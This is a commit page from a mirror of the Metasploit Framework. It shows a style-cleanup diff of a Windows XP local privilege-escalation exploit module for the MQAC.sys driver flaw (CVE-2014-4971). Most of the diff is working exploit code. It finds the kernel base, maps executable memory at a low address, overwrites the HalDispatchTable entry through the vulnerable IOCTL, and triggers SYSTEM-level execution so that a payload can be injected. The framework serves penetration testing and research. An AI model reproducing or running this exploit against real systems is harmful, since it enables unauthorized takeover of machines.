infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge rubocop changes from Kernelsmith

bug/bundler_fix
OJ 2014-07-30 08:35:57 +10:00
parent 210342df5b e00d892f99
commit f3e8c51573
No known key found for this signature in database
GPG Key ID: 49EEE7511FAA5749
1 changed files with 52 additions and 37 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

73
modules/exploits/windows/local/mqac_write.rb
View File

@ -14,62 +14,70 @@ class Metasploit3 < Msf::Exploit::Local
INVALID_HANDLE_VALUE = 0xFFFFFFFF
def initialize(info={})
super(update_info(info, {
def initialize(info = {})
super(update_info(info,
'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',
'Description' => %q{
'Description' => %q(
A vulnerability within the MQAC.sys module allows an attacker to
overwrite an arbitrary location in kernel memory.
This module will elevate itself to SYSTEM, then inject the payload
into another SYSTEM process.
},
),
'License' => MSF_LICENSE,
'Author' =>
[
'Matt Bergin', # original exploit and all the hard work
'Spencer McIntyre' # MSF module
],
'Arch' => [ ARCH_X86 ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Arch' => [ARCH_X86],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'EXITFUNC' => 'thread'
},
'Targets' =>
[
[ 'Windows XP SP3',
['Windows XP SP3',
{
'_KPROCESS' => "\x44",
'_TOKEN' => "\xc8",
'_UPID' => "\x84",
'_APLINKS' => "\x88"
}
],
]
],
'References' =>
[
[ 'CVE', '2014-4971' ],
[ 'EDB', '34112' ],
[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
%w(CVE 2014-4971),
%w(EDB 34112),
['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
],
'DisclosureDate'=> 'Jul 22 2014',
'DisclosureDate' => 'Jul 22 2014',
'DefaultTarget' => 0
}))
))
end
def find_sys_base(drvname)
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ['PBLOB', 'lpImageBase', 'out'], ['DWORD', 'cb', 'in'], ['PDWORD', 'lpcbNeeded', 'out']])
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ['LPVOID', 'ImageBase', 'in'], ['PBLOB', 'lpBaseName', 'out'], ['DWORD', 'nSize', 'in']])
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
lp_image_base = %w(PBLOB lpImageBase out)
cb = %w(DWORD cb in)
lpcb_needed = %w(PDWORD lpcbNeeded out)
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL',
[lp_image_base, cb, lpcb_needed])
image_base = %w(LPVOID ImageBase in)
lp_base_name = %w(PBLOB lpBaseName out)
n_size = %w(DWORD nSize in)
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD',
[image_base, lp_base_name, n_size])
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
current_drvname = results['lpBaseName'][0..results['return'] - 1]
if drvname == nil
if drvname.nil?
if current_drvname.downcase.include?('krnl')
return [address, current_drvname]
end
@ -99,12 +107,14 @@ class Metasploit3 < Msf::Exploit::Local
end
def open_device
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
if handle['return'] == 0
handle = session.railgun.kernel32.CreateFileA('\\\\.\\MQAC',
'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
handle = handle['return']
if handle == 0
print_error('Failed to open the \\\\.\\MQAC device')
return nil
end
handle = handle['return']
handle
end
def check
@ -141,8 +151,8 @@ class Metasploit3 < Msf::Exploit::Local
return
end
# Running on Windows XP versions that aren't listed in the supported list results
# in a BSOD and so we should not let that happen.
# Running on Windows XP versions that aren't listed in the supported list
# results in a BSOD and so we should not let that happen.
return unless check == Exploit::CheckCode::Appears
kernel_info = find_sys_base(nil)
@ -154,7 +164,10 @@ class Metasploit3 < Msf::Exploit::Local
this_proc = session.sys.process.open
unless this_proc.memory.writable?(base_addr)
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack('L'), nil, [ 0xffff ].pack('L'), 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('L'), nil,
[0xffff].pack('L'),
'MEM_COMMIT|MEM_RESERVE',
'PAGE_EXECUTE_READWRITE')
end
unless this_proc.memory.writable?(base_addr)
print_error('Failed to properly allocate memory')
@ -164,7 +177,8 @@ class Metasploit3 < Msf::Exploit::Local
hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
hKernel = hKernel['return']
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel,
'HalDispatchTable')
halDispatchTable = halDispatchTable['return']
halDispatchTable -= hKernel
halDispatchTable += kernel_info[0]
@ -193,8 +207,10 @@ class Metasploit3 < Msf::Exploit::Local
this_proc.close
print_status('Triggering vulnerable IOCTL')
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,
1, 0x258,
halDispatchTable + 0x4, 0)
session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
unless is_system?
print_error('Exploit failed')
@ -207,5 +223,4 @@ class Metasploit3 < Msf::Exploit::Local
fail_with(Failure::Unknown, 'Error while executing the payload')
end
end
end